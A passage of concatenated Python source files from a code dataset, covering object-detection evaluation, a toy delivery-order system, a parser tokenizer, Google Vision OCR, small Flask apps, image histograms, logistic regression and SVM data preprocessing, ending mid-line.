# initilize the tensor holder here.\n im_data = torch.FloatTensor(1)\n im_info = torch.FloatTensor(1)\n num_boxes = torch.LongTensor(1)\n gt_boxes = torch.FloatTensor(1)\n\n # ship to cuda\n if args.cuda:\n im_data = im_data.cuda()\n im_info = im_info.cuda()\n num_boxes = num_boxes.cuda()\n gt_boxes = gt_boxes.cuda()\n\n # make variable\n im_data = Variable(im_data)\n im_info = Variable(im_info)\n num_boxes = Variable(num_boxes)\n gt_boxes = Variable(gt_boxes)\n\n if args.cuda:\n cfg.CUDA = True\n\n if args.cuda:\n fasterRCNN.cuda()\n\n start = time.time()\n max_per_image = 100\n\n thresh = 0.0\n\n save_name = args.load_name.split('/')[-1]\n num_images = len(imdb.image_index)\n all_boxes = [[[] for _ in xrange(num_images)]\n for _ in xrange(imdb.num_classes)]\n\n output_dir = get_output_dir(imdb, save_name)\n dataset = roibatchLoader(roidb, ratio_list, ratio_index, 1,\n imdb.num_classes, training=False, normalize=False, path_return=True)\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1,\n shuffle=False, num_workers=args.num_workers,\n pin_memory=True)\n\n data_iter = iter(dataloader)\n\n _t = {'im_detect': time.time(), 'misc': time.time()}\n det_file = os.path.join(output_dir, 'detections.pkl')\n\n if(args.test_cache):\n with open(det_file, 'rb') as f:\n all_boxes = pickle.load(f)\n else:\n fasterRCNN.eval()\n empty_array = np.transpose(np.array([[], [], [], [], []]), (1, 0))\n for i in range(num_images):\n\n data = next(data_iter)\n im_data.data.resize_(data[0].size()).copy_(data[0])\n im_info.data.resize_(data[1].size()).copy_(data[1])\n gt_boxes.data.resize_(data[2].size()).copy_(data[2])\n num_boxes.data.resize_(data[3].size()).copy_(data[3])\n\n det_tic = time.time()\n fasterRCNN_result = fasterRCNN(\n im_data, im_info, gt_boxes, num_boxes)\n if len(fasterRCNN_result) == 10:\n # normal global local model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred, _ = fasterRCNN_result\n if len(fasterRCNN_result) == 9:\n # normal global or local model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred = fasterRCNN_result\n elif len(fasterRCNN_result) == 13:\n # vgg16_multiscale model\n rois, cls_prob, bbox_pred, \\\n rpn_loss_cls, rpn_loss_box, \\\n RCNN_loss_cls, RCNN_loss_bbox, \\\n rois_label, d_pred, _, _1, _2, _3 = fasterRCNN_result\n\n scores = cls_prob.data\n boxes = rois.data[:, :, 1:5]\n d_pred = d_pred.data\n path = data[4]\n\n if cfg.TEST.BBOX_REG:\n # Apply bounding-box regression deltas\n box_deltas = bbox_pred.data\n if cfg.TRAIN.BBOX_NORMALIZE_TARGETS_PRECOMPUTED:\n # Optionally normalize targets by a precomputed mean and stdev\n if args.class_agnostic:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(1, -1, 4)\n else:\n box_deltas = box_deltas.view(-1, 4) * torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_STDS).cuda() \\\n + torch.FloatTensor(cfg.TRAIN.BBOX_NORMALIZE_MEANS).cuda()\n box_deltas = box_deltas.view(\n 1, -1, 4 * len(imdb.classes))\n\n pred_boxes = bbox_transform_inv(boxes, box_deltas, 1)\n pred_boxes = clip_boxes(pred_boxes, im_info.data, 1)\n else:\n # Simply repeat the boxes, once for each class\n pred_boxes = np.tile(boxes, (1, scores.shape[1]))\n\n pred_boxes /= data[1][0][2].item()\n\n scores = scores.squeeze()\n pred_boxes = pred_boxes.squeeze()\n det_toc = time.time()\n detect_time = det_toc - det_tic\n misc_tic = time.time()\n\n vis = args.vis\n\n im2show = None\n if vis:\n im = cv2.imread(imdb.image_path_at(i))\n im2show = np.copy(im)\n\n for j in xrange(1, imdb.num_classes):\n inds = torch.nonzero(scores[:, j] > thresh).view(-1)\n # if there is det\n if inds.numel() > 0:\n cls_scores = scores[:, j][inds]\n _, order = torch.sort(cls_scores, 0, True)\n if args.class_agnostic:\n cls_boxes = pred_boxes[inds, :]\n else:\n cls_boxes = pred_boxes[inds][:, j * 4:(j + 1) * 4]\n\n cls_dets = torch.cat(\n (cls_boxes, cls_scores.unsqueeze(1)), 1)\n # cls_dets = torch.cat((cls_boxes, cls_scores), 1)\n cls_dets = cls_dets[order]\n keep = nms(cls_dets, cfg.TEST.NMS)\n cls_dets = cls_dets[keep.view(-1).long()]\n if vis:\n im2show = vis_detections(\n im2show, id2eng[imdb.classes[j]],\n np.array(cls_dets.cpu().numpy()), 0.5, [255, 0, 0],\n is_show_text=True)\n\n all_boxes[j][i] = cls_dets.cpu().numpy()\n else:\n all_boxes[j][i] = empty_array\n\n # Limit to max_per_image detections *over all classes*\n if max_per_image > 0:\n image_scores = np.hstack([all_boxes[j][i][:, -1]\n for j in xrange(1, imdb.num_classes)])\n if len(image_scores) > max_per_image:\n image_thresh = np.sort(image_scores)[-max_per_image]\n for j in xrange(1, imdb.num_classes):\n keep = np.where(\n all_boxes[j][i][:, -1] >= image_thresh)[0]\n all_boxes[j][i] = all_boxes[j][i][keep, :]\n\n misc_toc = time.time()\n nms_time = misc_toc - misc_tic\n\n sys.stdout.write('im_detect: {:d}/{:d} {:.3f}s {:.3f}s \\r'\n .format(i + 1, num_images, detect_time, nms_time))\n sys.stdout.flush()\n\n # To save image for analysis\n # Limit to threshhold detections *over all classes*\n if vis:\n threshold_of_vis = 0.1\n all_boxes_save_for_vis = all_boxes.copy()\n if max_per_image > 0:\n image_scores = np.hstack([all_boxes_save_for_vis[j][i][:, -1]\n for j in xrange(1, imdb.num_classes)])\n # np.sort(image_scores)[-max_per_image]\n image_thresh = threshold_of_vis\n for j in xrange(1, imdb.num_classes):\n keep = np.where(\n all_boxes_save_for_vis[j][i][:, -1] >= image_thresh)[0]\n all_boxes_save_for_vis[j][i] = all_boxes_save_for_vis[j][i][keep, :]\n\n if all_boxes_save_for_vis[1][i].shape[0] == 0:\n continue\n boxes_of_i = np.array([_[i]\n for _ in all_boxes_save_for_vis])\n\n # filter boxes with lower score\n # It is 0 for batch size is 1\n gt_boxes_cpu = gt_boxes.cpu().numpy()[0]\n try:\n gt_boxes_cpu[:, 0:4] /= float(im_info[0][2].cpu().numpy())\n except:\n pdb.set_trace()\n\n save_vis_root_path = './savevis/{}/{}/{}_{}_{}/'.format(args.net, test_dataset,\n args.checksession, args.checkepoch, args.checkpoint)\n\n # show ground-truth\n for gt_b in gt_boxes_cpu:\n try:\n # out of range\n show_cls_name = id2eng[imdb.classes[int(gt_b[-1])]]\n except:\n show_cls_name = 'Unknow'\n im2show = vis_detections(\n im2show, show_cls_name, gt_b[np.newaxis, :], 0.1, (0, 255, 0), True)\n\n i_row, i_c, _ = im2show.shape\n #im2show = cv2.resize(im2show, (int(i_c/2), int(i_row/2)))\n\n # save all\n save_vis_path = save_vis_root_path + \\\n 'All/'\n if not os.path.exists(save_vis_path):\n os.makedirs(save_vis_path)\n cv2.imwrite(os.path.join(save_vis_path,\n imdb.image_index[i]+'.jpg'), im2show)\n\n # save by condition\n # 1.gt未检测到\n # 2. gt类别错误(TODO)\n\n if False:\n for gt_b in gt_boxes_cpu:\n gt_cls_idx = int(gt_b[4])\n # 1 && 2\n if len(boxes_of_i[gt_cls_idx]) == 0:\n save_vis_path = save_vis_root_path + \\\n 'FN/' + imdb.classes[int(gt_cls_idx)]\n if not os.path.exists(save_vis_path):\n os.makedirs(save_vis_path)\n # im2vis_analysis = vis_detections(\n # im2show, imdb.classes[int(gt_b[-1])], gt_b[np.newaxis,:], 0.1, (204, 0, 0))\n cv2.imwrite(os.path.join(save_vis_path,\n imdb.image_index[i]+'.jpg'), im2show)\n\n gt_classes = [int(_[-1]) for _ in gt_boxes_cpu]\n # 3. FP\n for bi, det_b_cls in enumerate(boxes_of_i):\n if len(det_b_cls) > 0 and any(det_b_cls[:, 4] > 0.5):\n if bi not in gt_classes:\n save_vis_path = save_vis_root_path + \\\n 'FP/' + str(imdb.classes[bi])\n if not os.path.exists(save_vis_path):\n os.makedirs(save_vis_path)\n cv2.imwrite(os.path.join(save_vis_path,\n imdb.image_index[i]+'.jpg'), im2show)\n\n with open(det_file, 'wb') as f:\n pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)\n\n end = time.time()\n print(\"test time: %0.4fs\" % (end - start))\n\n print('Evaluating detections')\n # evaluate mAP\n cls_ap_zip, dataset_mAP = imdb.evaluate_detections(\n all_boxes, output_dir)\n cls_ap = list(cls_ap_zip)\n\n # for excl canteen\n if 'excl' in test_canteen:\n val_categories = get_categories(\n \"{}\".format(test_canteen)+\"_\"+\"trainmt10\")\n # for collcted canteen cross domain test, which is the inner split\n else:\n val_categories = get_categories(\"{}\".format(test_canteen)+\"_\"+\"inner\")\n map_exist_cls = []\n\n save_record_file_path = \"/\".join(args.load_name.split('/')[:-1])\n load_model_name = args.load_name.split('/')[-1]\n with open(save_record_file_path + '/record_categroy.txt', 'w') as f:\n cls_chn_str = \"\"\n ap_str =\"\"\n cls_eng_str = \"\"\n if val_categories is not None:\n for cls, ap in cls_ap:\n if cls in val_categories:\n if np.isnan(ap):\n continue\n else:\n map_exist_cls.append(ap)\n cls_chn_str += id2chn[cls].replace('&', '')\n cls_chn_str += '&'\n cls_eng_str += id2eng[cls].replace('&', '')\n cls_eng_str += '&'\n ap_str += '{:.2f}'.format(ap * 100)\n ap_str += '&'\n print(cls, ap)\n f.write(id2eng[cls].replace('&', '') + '&' + '{:.2f}'.format(ap * 100) + '\\\\\\\\\\n')\n\n map_exist_cls = sum(map_exist_cls) / len(map_exist_cls)\n print(map_exist_cls)\n #f.write(cls_chn_str + '\\n' + cls_eng_str + '\\n' + ap_str)\n else:\n cls_str = \"\"\n for cls, ap in cls_ap:\n cls_str += cls.replace('&','')\n cls_str += '&'\n ap_str += '{:.2f}'.format(ap * 100)\n ap_str += '&'\n print(cls_ap_zip, dataset_mAP)\n f.write(cls_str + '\\n' + ap_str)\n\n\n\n with open(save_record_file_path + '/record.txt', 'a') as f:\n f.write(str(load_model_name) + '\\t')\n f.write(str(map_exist_cls) + '\\n')\n\n","sub_path":"app/test_backbone.py","file_name":"test_backbone.py","file_ext":"py","file_size_in_byte":19262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"279484523","text":"\"\"\"\nThis module contains program, which helps to make purchases in the virtual market.\n\"\"\"\n\n\nclass Item:\n \"\"\"\n This class creates objects (items), which you buy.\n\n >>> my_oitem = Item(\"salt\", 12)\n >>> my_oitem.name\n 'salt'\n \"\"\"\n\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def __str__(self):\n \"\"\"\n Ths method returns your item`s name and price.\n\n >>> my_oitem = Item(\"salt\", 12)\n >>> my_oitem.__str__()\n 'salt, price - 12'\n \"\"\"\n return self.name + \", price - \" + str(self.price)\n\n\nclass Vehicle:\n \"\"\"\n This class creates objectes (vehicles).\n\n >>> my_vehicle = Vehicle(1, True)\n >>> my_vehicle.vehicleNo\n 1\n \"\"\"\n\n def __init__(self, vehicleNo, isAvailable):\n self.vehicleNo = vehicleNo\n self.isAvailable = isAvailable\n\n\nclass Location:\n \"\"\"\n This class creates object - location.\n\n >>> my_loc = Location(\"Kiev\", 42)\n >>> my_loc.city\n 'Kiev'\n \"\"\"\n\n def __init__(self, city, postoffice):\n self.city = city\n self.postoffice = postoffice\n\n\nclass Order():\n \"\"\"\n This class creates your order, according to the data you entered.\n\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.orderId\n 165488695\n \"\"\"\n\n def __init__(self, orderId, user_name, city, postoffice, items, vechile=None):\n self.orderId = orderId\n self.location = Location(city, postoffice)\n self.user_name = user_name\n self.items = items\n self.vechile = vechile\n\n def __str__(self):\n \"\"\"\n This method returns your order number.\n\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.__str__()\n 'Your order number is 165488695.'\n \"\"\"\n return \"Your order number is \" + str(self.orderId) + \".\"\n\n def calculateAmount(self):\n \"\"\"\n This method calculates the whole price of your products.\n\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\n postoffice=53, items=my_items)\n >>> my_order.calculateAmount()\n 154\n \"\"\"\n result = 0\n for i in self.items:\n result += i.price\n return result\n\n def assignVechile(self, vechile: Vehicle):\n \"\"\"\n This method assigns a vehicle to the order, and returns nothing.\n \"\"\"\n self.vechile = vechile\n counter = 0\n for i in vechile:\n if i.isAvailable:\n i.isAvailable = False\n counter += 1\n break\n if counter == 0:\n print(\"There is no available vehicle to deliver an order.\")\n\n\nclass LogisticSystem():\n \"\"\"\n This clas creates objects which helps with navigating in your order.\n\n >>> vehicles = [Vehicle(1, True), Vehicle(2, True)]\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> print(logSystem.orders[0])\n Your order number is 165488695.\n \"\"\"\n\n def __init__(self, orders, vehicles):\n self.orders = orders\n self.vehicles = vehicles\n\n def placeOrder(self, order: Order):\n \"\"\"\n This method submits your order, and assigns to it a vehicle.\n\n >>> vehicles = []\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> logSystem.placeOrder(my_order)\n There is no available vehicle to deliver an order.\n \"\"\"\n self.order = order\n order.assignVechile(self.vehicles)\n\n def trackOrder(self, orderId):\n \"\"\"\n This method helps to track status of your order.\n\n >>> vehicles = [Vehicle(1, True), Vehicle(2, True)]\n >>> my_items = [Item('book', 110), Item('chupachups', 44)]\n >>> my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\\\npostoffice=53, items=my_items)\n >>> logSystem = LogisticSystem([my_order], vehicles)\n >>> logSystem.trackOrder(165488695)\n Your order #165488695 is sent to Lviv. Total price: 154 UAH.\n \"\"\"\n counter = 0\n for i in self.orders:\n if i.orderId == orderId:\n print(\"Your order #\" + str(orderId) + \" is sent to \" + i.location.city +\n \". Total price: \" + str(i.calculateAmount()) + \" UAH.\")\n counter += 1\n break\n if counter == 0:\n print(\"No such order.\")\n\n\nif __name__ == \"__main__\":\n loc = Location(\"Lviv\", 12)\n my_vehicles = [Vehicle(1, True), Vehicle(2, True)]\n my_items = [Item('book', 110), Item('chupachups', 44)]\n my_order = Order(user_name='Oleg', orderId=165488695, city='Lviv',\n postoffice=53, items=my_items)\n my_items2 = [Item('flowers', 11), Item(\n 'shoes', 153), Item('helicopter', 0.33)]\n my_order2 = Order(186541566, 'Andrii', 'Odessa', 3, my_items2)\n my_items3 = [Item('coat', 61.8), Item(\n 'shower', 5070), Item('rollers', 700)]\n my_order3 = Order(186541546, \"Olesya\", 'Kharkiv', 17, my_items3)\n print(my_order)\n logSystem = LogisticSystem([my_order, my_order2, my_order3], my_vehicles)\n","sub_path":"labwork4/make_your_order.py","file_name":"make_your_order.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"299047642","text":"import re, enum\nfrom typing import List\nfrom pathlib import Path\nfrom codecs import StreamReader\nfrom Parser.ParserLocalisation import Operator\n\n\nclass Token(object):\n\t\"\"\"description of class\"\"\"\n\n\tinverted = False\n\tdisabled = False\n\tdef __init__(self, Type : str, value: str, operator : object, parent ):\n\t\tsuper().__init__()\n\t\tself.type = Type.lower()\n\t\tif value is not None:\n\t\t\tself.value = None\n\t\telse:\n\t\t\tself.value = repr.sub(\"^\\\"(.*)\\\"$\", \"\\1\", value);\n\t\tself.operator = operator\n\t\tself.parent = parent\n\t\tif parent is not None:\n\t\t\tparent.add(self)\n\t\tself.children = []\n\t\t@clsmethod\n\t\tdef tokenize(cls, s :str, parent: Token) -> cls:\n\t\t\t\"\"\"\t/**\n\t\t\t * Creates a token from a given string and its parent token\n\t\t\t * @param s The string to turn into a token\n\t\t\t * @param parent The block it is contained within\n\t\t\t * @return The created token\n\t\t\t */\"\"\"\n\t\t\toperator = None\n\t\t\tindex = -1\n\t\t\tif s.find('=') != -1:\n\t\t\t\toperator = Operator.EQUAL\n\t\t\t\tindex = s.find('=')\n\n\t\t\tif index == -1:\n\t\t\t\treturn cls(s, None,None,parent)\n\t\t\telse:\n\t\t\t\treturn cls(s[:index].strip(), s[index:].strip(), operator, parent)\n\n\t\t@classmethod\n\t\tdef tokenizeFile(cls, fileStream : StreamReader ) -> Token:\n\t\t\troot = cls(\"file\", None, None,None)\n\t\t\tblock = root\n\t\t\tlines = files.readlines()\n\t\t\tfor string in lines:\n\t\t\t\tif string == \"}\":\n\t\t\t\t\tblock = block.parent\n\t\t\t\telif string.find('{') != -1:\n\t\t\t\t\tblock = tokenize(string , block)\n\t\t\t\telse:\n\t\t\t\t\ttokenize(string , block)\n\t\t\treturn root\n\t\tdef __str__(self) -> str:\n\t\t\tif self.value is None:\n\t\t\t\treturn self.type\n\t\t\telse:\n\t\t\t\top = \"\"\n\t\t\t\tif self.operator == Operator.LESS:\n\t\t\t\t\top = '<'\n\t\t\t\telif self.operator == Operator.EQUAL:\n\t\t\t\t\top = \"=\"\n\t\t\t\telse:\n\t\t\t\t\traise Exception(\"Invalid operator!\")\n\t\t\t\treturn \"{} {} {}\".format(self.type, op , self.value)\n\n\n\n","sub_path":"python/Parser/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"214456802","text":"def computepay(h,r):\r\n try:\r\n ihrs=float(h)\r\n irate=float(r)\r\n except:\r\n print(\"Enter numbers\")\r\n quit()\r\n if ihrs <= 40:\r\n pay=ihrs*irate\r\n return pay\r\n else:\r\n pay=ihrs*irate\r\n ipay=(ihrs-40)*irate/2\r\n total=pay+ipay\r\n return total\r\n\r\n\r\n\r\nhrs=input(\"Enter hours worked: \")\r\nrate=input(\"Enter rate: \")\r\np=computepay(hrs,rate)\r\nprint(\"Pay\",p)","sub_path":"fpay.py","file_name":"fpay.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"504339595","text":"# '''from google.cloud import vision\r\n# import os\r\n# os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"gcp-explore-261416-44d1aa9d9fa7.json\"\r\n# client = vision.ImageAnnotatorClient()\r\n# import io\r\n#\r\n# path = \"/home/aashi/Downloads/index.jpeg\"\r\n# with io.open(path, 'rb') as image_file:\r\n# content = image_file.read()\r\n# image = vision.types.Image(content=content)\r\n# response = client.image_properties(image=image)\r\n# props = response.image_properties_annotation\r\n# print('Properties of the image:')\r\n#\r\n# for color in props.dominant_colors.colors:\r\n# print('Fraction: {}'.format(color.pixel_fraction))\r\n# print('\\tr: {}'.format(color.color.red))\r\n# print('\\tg: {}'.format(color.color.green))\r\n# print('\\tb: {}'.format(color.color.blue))'''\r\n\r\nimport os\r\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"client.json\"\r\n\r\ndef detect_text(path):\r\n \"\"\"Detects text in the file.\"\"\"\r\n from google.cloud import vision\r\n import io\r\n client = vision.ImageAnnotatorClient()\r\n\r\n with io.open(path, 'rb') as image_file:\r\n content = image_file.read()\r\n\r\n image = vision.types.Image(content=content)\r\n\r\n response = client.text_detection(image=image)\r\n texts = response.text_annotations\r\n # print(texts)\r\n # print(texts.description)\r\n # return (\"hello\")\r\n l = []\r\n for text in texts:\r\n l.append((text.description))\r\n\r\n # vertices = (['({},{})'.format(vertex.x, vertex.y)\r\n return l # for vertex in text.bounding_poly.vertices])\r\n\r\n # print('bounds: {}'.format(','.join(vertices)))\r\n\r\n# detect_text(\"C://Users//Shilpa Bundela//Desktop//ocr//upload_file_python-master//src//images//demo.jpg\")\r\n'''path and name of image'''\r\n# import os\r\n'''# os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]=\"client.json\"'''\r\n# def detect_text(uri):\r\n# \"\"\"Detects text in the file located in Google Cloud Storage or on the Web.\r\n# \"\"\"\r\n# from google.cloud import vision\r\n# client = vision.ImageAnnotatorClient()\r\n# image = vision.types.Image()\r\n# image.source.image_uri = uri\r\n#\r\n# response = client.text_detection(image=image)\r\n# texts = response.text_annotations\r\n# print('Texts:')\r\n# print((texts))\r\n#\r\n# for text in texts:\r\n# print('\\n\"{}\"'.format(text.description))\r\n#\r\n# vertices = (['({},{})'.format(vertex.x, vertex.y)\r\n# for vertex in text.bounding_poly.vertices])\r\n#\r\n# print('bounds: {}'.format(','.join(vertices)))\r\n# detect_text(\"gs://uniqueway1/index.jpeg\")\r\n","sub_path":"Rachit_GoogleApi_Project/src/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296860505","text":"#!/usr/bin/python3\n\"\"\"Script that starts a Flask web application\"\"\"\nfrom flask import Flask, render_template\nfrom models import storage\nfrom models import State\napp = Flask(\n __name__,\n template_folder=\"templates\"\n)\napp.url_map.strict_slashes = False\n\n\n@app.route('/states')\ndef states():\n \"\"\"display a HTML page\"\"\"\n new_dict = storage.all(State)\n return render_template('9-states.html', states=new_dict)\n\n\n@app.route('/states/')\ndef states_id(id):\n \"\"\"display a HTML page\"\"\"\n new_dict = storage.all(State)\n if \"State.\" + id in new_dict:\n for key, value in new_dict.items():\n if id in key:\n name = value.name\n city_dict = value.cities\n else:\n return render_template('9-states.html', els=True)\n return render_template('9-states.html', cities=city_dict,\n id=id, name=name)\n\n\n@app.teardown_appcontext\ndef teardown_db(exception):\n \"\"\"Remove the current SQLAlchemy Session\"\"\"\n storage.close()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"368534808","text":"from models.user import User\nfrom flask import Response\nfrom flask_restful import Resource, reqparse, request\nfrom security.jwt_initialize import jwt_required, get_jwt_identity\nfrom services.user import UserService\nfrom flask_mongoengine import DoesNotExist\n\nclass UserController(Resource):\n\n @jwt_required\n def get(self):\n args = request.args\n print(args)\n username = request.args.get('username')\n try:\n if username:\n users = UserService.buscar_por_username(username)\n else:\n users = UserService.buscar_todos()\n return Response(users, mimetype=\"application/json\", status=200)\n except DoesNotExist:\n return {'message': 'Usuário não encontrado'}, 404","sub_path":"backend/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"212437565","text":"\"\"\"\r\n Python program to analyze an image using Histogram\r\n\"\"\"\r\n\r\n# importing required libraries of opencv\r\nimport cv2\r\n\r\n# importing library for plotting\r\nfrom matplotlib import pyplot as plt\r\n\r\n# reads an input image\r\nimg = cv2.imread(\"../images/1.jpeg\", 0)\r\nimg1 = cv2.imread(\"../images/2.jpeg\")\r\nimg2 = cv2.imread(\"../images/3.jpeg\")\r\nimg3 = cv2.imread(\"../images/1bit.png\")\r\n\r\n# find frequency of pixels in range 0-255\r\nhistr = cv2.calcHist([img], [0], None, [256], [0, 256])\r\n# histr1 = cv2.calcHist([img1], [0], None, [256], [0, 256])\r\n# histr2 = cv2.calcHist([img2], [0], None, [256], [0, 256])\r\n# histr3 = cv2.calcHist([img3], [0], None, [256], [0, 256])\r\n\r\n# show the plotting graph of an image\r\nplt.plot(histr)\r\n# plt.plot(histr1)\r\n# plt.plot(histr2)\r\n# plt.plot(histr3)\r\n\r\n# alternative way to find histogram of an image\r\nplt.hist(img.ravel(), 256, [0, 256])\r\n\r\nplt.show()","sub_path":"Image_Processing/Analyze_an_image_using_Histogram.py","file_name":"Analyze_an_image_using_Histogram.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544879536","text":"result=0\nsum=0\nstart=0\nN,M = [int(x) for x in input().split()]\ndata = [int(x) for x in input().split()]\nfor x in data:\n sum=sum+x\n if sum>=M:\n while sum>=M :\n if sum == M:\n result=result+1\n sum = sum - data[start]\n start = start + 1\n\nprint (result)\n","sub_path":"Algorithm/Back_2003.py","file_name":"Back_2003.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"602455431","text":"import os\nimport sys\nimport argparse\nfrom copy import copy\nsys.path.insert(0,os.path.abspath(os.path.join(sys.path[0],\"..\")))\nfrom live.Logistic_live import Logistic_online\n\nif __name__ == '__main__':\n desc = 'the logistic regression model'\n parser = argparse.ArgumentParser(description=desc)\n\n #script parameters\n parser.add_argument('-o', '--action', type=str,\n help='action that we wish to take, has potential values of : train, test, tune',\n default='train'\n )\n\n #result parameters\n parser.add_argument('-s','--horizon',type=int,\n help='the prediction horizon',\n default=5\n )\n parser.add_argument('-gt', '--ground_truth', type=str, \n help='the name of the column that we are predicting either value or direction',\n default=\"LME_Co_Spot\"\n )\n parser.add_argument('-sou','--source', type = str, \n help='source of data', \n default = \"NExT\"\n )\n parser.add_argument('-v','--version', type = str, \n help='feature version for data', \n default = 'v10'\n )\n parser.add_argument('-d', '--date', type=str,\n help = \"string of comma-separated dates which identify the total period of deployment by half-years\"\n )\n\n #hyperparameters\n parser.add_argument('-l','--lag', type=int, \n help='lag',\n default = 5\n )\n parser.add_argument('-max_iter','--max_iter',type=int,\n help='max number of iterations',\n default=100\n )\n parser.add_argument('-C', '--C', type=float,\n help = 'inverse of learning rate'\n )\n args = parser.parse_args()\n\n #initialize model\n model = Logistic_online(lag = args.lag, horizon = args.horizon, version = args.version, gt = args.ground_truth, date = args.date, source = args.source)\n \n #case if action is tune\n if args.action==\"tune\":\n model.tune(100)\n\n #case if action is train\n elif args.action=='train':\n model.train(C=args.C, max_iter=args.max_iter)\n \n #case if action is test\n else:\n final = model.test()\n","sub_path":"code/train_data_logistic.py","file_name":"train_data_logistic.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"602034021","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport argparse\r\nimport svmutil\r\nimport sys,os\r\nassert(\"3.7\" in sys.version)\r\nfrom svm import *\r\nfrom sklearn.svm import LinearSVC\r\nfrom PIL import Image\r\nfrom mini_lambs import JOIN,STR_WRITE\r\nimport numpy as np\r\nimport pickle\r\nfrom svmutil import *\r\n\r\ndef run_loop(CLASSES,new_filename,class_path,NUM_CLASSES,NUM_PTS_PER_CLASS):\r\n\tf_data = open(new_filename, 'w', encoding='utf-8')\r\n\tfor chin_index,chin_char in enumerate(CLASSES):\r\n\t\tif(chin_index%5==0): \r\n\t\t\tprint(\"chin_index: {}\".format(chin_index))\r\n\t\t\tif(chin_index==NUM_CLASSES): break\r\n\t\tjpg_path = JOIN(class_path, chin_char)\r\n\t\tfor img_index,img in enumerate(os.listdir(jpg_path)):\r\n\t\t\tif(img_index%5==0):\r\n\t\t\t\tprint(\"\\timg_index: {}\".format(img_index))\r\n\t\t\t\tif(img_index==NUM_PTS_PER_CLASS): break\r\n\t\t\tNP2D = np.asarray(Image.open(JOIN(jpg_path,img)).getdata()).reshape(5670).astype(str)\r\n\t\t\twrite_data = STR_WRITE(chin_index, NP2D)\r\n\t\t\tf_data.write(write_data)\r\n\tf_data.close()\r\n\treturn\r\n\r\n#preprocess the data given filepath (train and test);\r\n# calculate accuracy percentage\r\ndef preprocess_data_svm(filepath1, filepath2, NUM_CLASSES, NUM_PTS_PER_CLASS_1, NUM_PTS_PER_CLASS_2):\r\n\tclass_path_1 = JOIN(os.getcwd(), filepath1)\r\n\tclass_path_2 = JOIN(os.getcwd(), filepath2)\r\n\tCLASSES = os.listdir(class_path_1)\r\n\ttry: os.mkdir(\"svm_data\")\t\r\n\texcept: print(\"Directory present - moving on...\")\r\n\tnew_filename_1 = JOIN(os.getcwd(),JOIN(\"svm_data\", filepath1[:9]+\".tr\"))\r\n\tnew_filename_2 = JOIN(os.getcwd(),JOIN(\"svm_data\", filepath2[:9]+\".te\"))\r\n\trun_loop(CLASSES,new_filename_1,class_path_1,NUM_CLASSES,NUM_PTS_PER_CLASS_1) \r\n\trun_loop(CLASSES,new_filename_2,class_path_2,NUM_CLASSES,NUM_PTS_PER_CLASS_2)\r\n\treturn\r\n\r\n##loads relevant data from filepath provided...\r\ndef train_test_X_Y(filepath1): #NOTE: data MUST be in format provided given filepath\r\n\tX_t,y_t = [],[]\r\n\twith open(filepath1, 'r', encoding='utf-8') as f:\r\n\t\tfor index,line in enumerate(f.readlines()):\r\n\t\t\tif(index%100==0): print(\"\\tindex: {}\".format(index))\r\n\t\t\ty_t.append(int(line[0]))\r\n\t\t\tX_t_new = list(filter(lambda x: \":\" in x, line[1:].strip().split(\" 